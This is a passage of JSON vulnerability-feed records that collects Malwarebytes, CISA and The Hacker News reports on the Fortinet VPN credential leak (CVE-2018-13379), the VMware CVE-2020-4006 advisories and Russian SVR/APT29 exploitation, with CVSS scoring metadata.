"https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T16:34:58", "description": "A threat actor has leaked a list of almost 500,000 Fortinet VPN credentials, stolen from 87,000 vulnerable FortiGate SSL-VPN devices. The breach list provides raw access to organizations in 74 countries, including the USA, India, Taiwan, Italy, France, and Israel, with almost 3,000 US entities affected.\n\nAccording to [Fortinet](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) the credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) at the time of the actor's scan. **Even if the devices have since been patched, if the passwords were not reset, they remain vulnerable.**\n\n### CVE-2018-13379\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question provides an improper limitation of a pathname to a restricted directory in several Fortinet FortiOS and FortiProxy versions. The vulnerable SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP requests. Apparently the FortiOS system files also contained login credentials.\n\nIn April, CVE-2018-13379 was mentioned in a joint [advisory](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from the NSA, CISA, and the FBI as one of five vulnerabilities widely used in on-going attacks by the Russian Foreign Intelligence Service (SVR). A patch for the vulnerability has been available since May 2019, but this patch has not been applied as widely as necessary.\n\n### The threat actor\n\nThe source, and the websites that leaked the information, make for an interesting story as well. The list of Fortinet credentials was leaked by someone going by the handle 'Orange.' Orange is also the administrator of the newly launched RAMP hacking forum, and a previous operator of the Babuk Ransomware operation.\n\nAfter the [announced retirement of the Babuk gang](<https://blog.malwarebytes.com/reports/2021/06/babuk-ransomware-builder-leaked-following-muddled-retirement/>), Orange apparently went his own way and started RAMP. Orange is now involved in the Groove ransomware operation, which allegedly employs several former Babuk developers. The leak of Fortinet VPN SSL credentials was mirrored on the Groove leak website. Both posts lead to a file hosted on a Tor storage server known to be used by the Groove gang.\n\nRansomware leak sites are used to create some extra leverage over victim organizations. The ransomware attackers steal data from the infiltrated system while they deploy their ransomware. They then threaten to publish the data if the victim decides not to pay. Depending on the kind of data, this can be a rather compelling reason to give in.\n\n### Vulnerable security software\n\nOrganizations use Virtual Private Networks (VPNs) to provide remote access to their systems from the Internet. By design a VPN is remotely accessible so employees can reach them from anywhere, which also means that attackers can reach them from anywhere. And since VPNs provide access to an organization's soft underbelly, a VPN that has a known vulnerability represents a high value target that's easy to reach.\n\nThat makes swift patching an absolute necessity, but many organizations find this difficult, in part because VPNs are so important for remote working. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nA leak of this type is serious since valid VPN credentials could allow threat actors to access a network to steal data, expand their access, and run ransomware or other malware.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above, followed by initiating an organization-wide password reset, warning that you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\n\nThe post [500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T15:37:43", "type": "malwarebytes", "title": "500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T15:37:43", "id": "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-02T18:16:16", "description": "We had a very busy week at Malwarebytes Labs. \n\nWe offered advice on [Google's patch for an actively exploited zero-day bug that affects Chrome users](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/google-patches-exploited-zero-day-bug-that-affects-chrome-users/>), our podcast talked about [finding consumer value in Cybersecurity Awareness Month with Jamie Court](<https://blog.malwarebytes.com/podcast/2020/10/lock-and-code-s1ep18-finding-consumer-value-in-cybersecurity-awareness-month-with-jamie-court/>), we provided guidance about [keeping ransomware cash away from your business](<https://blog.malwarebytes.com/cybercrime/2020/10/keeping-ransomware-cash-away-from-your-business/>), pointed out how [scammers are spoofing bank phone numbers to rob victims](<https://blog.malwarebytes.com/social-engineering/2020/10/scammers-are-spoofing-bank-phone-numbers-to-rob-victims/>), analyzed how a [fake COVID-19 survey hides ransomware in a Canadian university attack](<https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/>), and discussed [how a new Emotet delivery method was spotted during a downward detection trend](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/new-emotet-delivery-method-spotted-during-downward-detection-trend/>). \n\nBelieve it or not, we also found time to explain what was going on with [the HP printer issue on Mac](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/hp-printer-issue-on-mac/>), analyzed how [California\u2019s Prop 24 splits data privacy supporters](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/prop-24-splits-data-privacy-supporters-in-california/>) and discussed [Vastaamo, a data breach with unprecedented consequences](<https://blog.malwarebytes.com/cybercrime/2020/10/vastaamo-psychotherapy-data-breach-sees-the-most-vulnerable-victims-extorted/>). \n\n## Other cybersecurity news\n\n * [Federal agencies](<https://www.nbcnews.com/news/us-news/fbi-other-agencies-warn-imminent-cybercrime-threat-u-s-hospitals-n1245212>) are warning of an increased and imminent cybercrime threat to US hospitals and healthcare providers, especially with regard to ransomware attacks. (Source: NBC)\n * Despite their own claims, questions have been raised as to whether the [SunCrypt](<https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/>) gang are indeed the newest members of the Maze cartel. (Source: Security Boulevard)\n * The five biggest cybersecurity threats for the healthcare industry as seen by cloud-first security firm [Wandera](<https://www.techrepublic.com/article/security-firm-identifies-5-biggest-cybersecurity-risks-for-hospitals-and-healthcare-organizations/>). (Source: TechRepublic)\n * CVE-2020-14882 A bug in [Oracle Weblogic](<https://isc.sans.edu/diary/rss/26734>) is being actively exploited, and the exploitation is trivial. (Source: InfoSec Handlers Diary Blog)\n * Foreign cyber threats to the [2020 US presidential election](<https://www.digitalshadows.com/blog-and-research/foreign-cyber-threats-to-the-2020-us-presidential-election/>) are predominantly sophisticated disinformation campaigns. (Source: digital shadows)\n * Why [satellite hacking](<https://eurasiantimes.com/why-satellite-hacking-has-become-the-biggest-global-threat-for-countries-like-us-china-russia-india/>) has become the biggest global threat for countries like the US, China, Russia, and India? (Source: The Eurasia Times)\n * [Facebook](<https://www.axios.com/facebook-warns-of-perception-hacks-undermining-trust-in-democracy-59fde96f-51a3-4dc5-b8a0-8f0a6a863840.html>) warned of perception hacks undermining trust in democracy. (Source: Axios)\n * Microsoft warned that threat actors are actively exploiting systems unpatched against the [ZeroLogon](<https://www.bleepingcomputer.com/news/security/microsoft-warns-of-ongoing-attacks-using-windows-zerologon-flaw/>) privilege escalation vulnerability in the Netlogon Remote Protocol. (Source: BleepingComputer)\n * [Email compromise attacks](<https://betanews.com/2020/10/29/email-compromise-attacks-increase/>) are on the increase as threat actors shift their focus from finance employees to group mailboxes. (Source: BetaNews)\n * [Zoom](<https://www.zdnet.com/article/zoom-rolls-out-encryption-for-all-desktop-and-mobile-users/>) has kicked off end-to-end encryption for its mobile and desktop apps. (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (October 26 \u2013 November 1)](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-02T17:46:12", "type": "malwarebytes", "title": "A week in security (October 26 \u2013 November 1)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-11-02T17:46:12", "id": "MALWAREBYTES:813434778D13E29E56560316C9FCD816", "href": "https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-09-29T18:14:37", "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-15T00:00:00", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-09-28T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:33", "description": "The National Security Agency (NSA) has released a Cybersecurity Advisory on Russian state-sponsored actors exploiting CVE-2020-4006, a command-injection vulnerability in VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector. The actors were found exploiting this vulnerability to access protected data on affected systems. The NSA advisory provides mitigation and detection guidance.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates and detection guidance.\n\n * NSA Cybersecurity Advisory [Russian State-Sponsored Actors Exploiting Vulnerability in VMware Workspace ONEAccess Using Compromised Credentials](<https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF>)\n * VMware Security Advisory [VMSA-2020-0027.2](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n * CERT Coordination Center (CERT/CC) Vulnerability Note [VU#724367](<https://www.kb.cert.org/vuls/id/724367>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/12/07/nsa-releases-advisory-russian-state-sponsored-malicious-cyber>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-07T00:00:00", "type": "cisa", "title": "NSA Releases Advisory on Russian State-Sponsored Malicious Cyber Actors Exploiting CVE-2020-4006", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-07T00:00:00", "id": "CISA:040FDAD04D5D46EE1B966151F70C1621", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/12/07/nsa-releases-advisory-russian-state-sponsored-malicious-cyber", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:35", "description": "VMware has released workarounds to address a vulnerability\u2014CVE-2020-4006\u2014in VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector. An attacker could exploit this vulnerability to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review VMware Security Advisory [VMSA-2020-0027](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU#724367](<https://www.kb.cert.org/vuls/id/724367>) and apply the necessary workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/11/23/vmware-releases-workarounds-cve-2020-4006>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-23T00:00:00", "type": "cisa", "title": "VMware Releases Workarounds for CVE-2020-4006", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2020-11-24T00:00:00", "id": "CISA:10689A7EB0060FEA79F8CE394E1E29A7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/11/23/vmware-releases-workarounds-cve-2020-4006", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:36", "description": "VMware has released security updates to address a vulnerability\u2014CVE-2020-4006\u2014in VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector. An attacker could exploit this vulnerability to take control of an affected system. \n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory [VMSA-2020-0027.2](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html >) and apply the necessary updates. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/12/03/vmware-releases-security-updates-address-cve-2020-4006>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-03T00:00:00", "type": "cisa", "title": "VMware Releases Security Updates to Address CVE-2020-4006", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-03T00:00:00", "id": "CISA:5210B7B2A0F699859FA5687AE54998B8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/12/03/vmware-releases-security-updates-address-cve-2020-4006", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, 